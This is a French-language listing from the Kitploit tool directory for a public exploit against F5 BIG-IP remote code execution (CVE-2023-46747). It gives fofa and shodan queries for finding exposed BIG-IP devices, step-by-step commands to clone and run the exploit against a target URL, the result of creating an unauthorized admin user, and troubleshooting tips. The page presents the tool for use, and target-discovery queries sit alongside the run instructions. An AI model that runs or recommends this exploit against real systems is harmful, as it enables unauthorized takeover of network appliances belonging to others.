Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-46747-RCE — exploit pour f5-big-ip RCE cve-2023-46747 | Kitploit
Outils/GitHubGitHub/w01fh4cker/cve-2023-46747-rce
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationRed Teaming
GitHubw01fh4cker/cve-2023-46747-rce

CVE-2023-46747-RCE

exploit pour f5-big-ip RCE cve-2023-46747

Voir le dépôt
20947il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Détails de la vulnérabilité

fofa :

root@kitploit:~
(title="BIG-IP®" || icon_hash="-335242539")

shodan

root@kitploit:~
title:"BIG-IP®"

Versions concernées

https://my.f5.com/manage/s/article/K000137353

Reproduction de la vulnérabilité

  1. Pour le moment, le seul utilisateur ici est admin : image

  2. Exécutez le script :

root@kitploit:~
git clone https://github.com/W01fh4cker/CVE-2023-46747-RCE.git
cd CVE-2023-46747-RCE
pip install -r requirements.txt
python CVE-2023-46747-RCE.py -u https://192.168.161.190
# python CVE-2023-46747-RCE.py -u https://192.168.161.190 -p http://127.0.0.1:7890

Commande exécutée avec succès :
image

  1. Un nouvel utilisateur a été créé avec succès sans autorisation ici : image

Limitation

L'exploitation échoue sur certaines versions, référence : https://twitter.com/joel_land/status/1729147886615818732.

Questions et réponses

  1. Q : L'acquisition du jeton a échoué ?
    R : On ne peut pas affirmer que le site testé ne présente aucune vulnérabilité, car la création d'un utilisateur sans autorisation n'est pas réussie à 100 %. Parfois, pour diverses raisons, l'utilisateur n'est pas créé lors de la première étape, ce qui fait que le jeton de la deuxième étape ne peut pas être obtenu. Par conséquent, je suggère d'essayer plusieurs fois. Si cela ne fonctionne pas, cela peut signifier qu'il n'y a effectivement aucune vulnérabilité.

Digression

Vous pouvez utiliser ce script https://github.com/BishopFox/bigip-scanner pour collecter les informations de version de F5 BIG-IP. C'est génial !

Références

https://github.com/projectdiscovery/nuclei-templates/pull/8500
https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg
https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747

Télécharger l’outil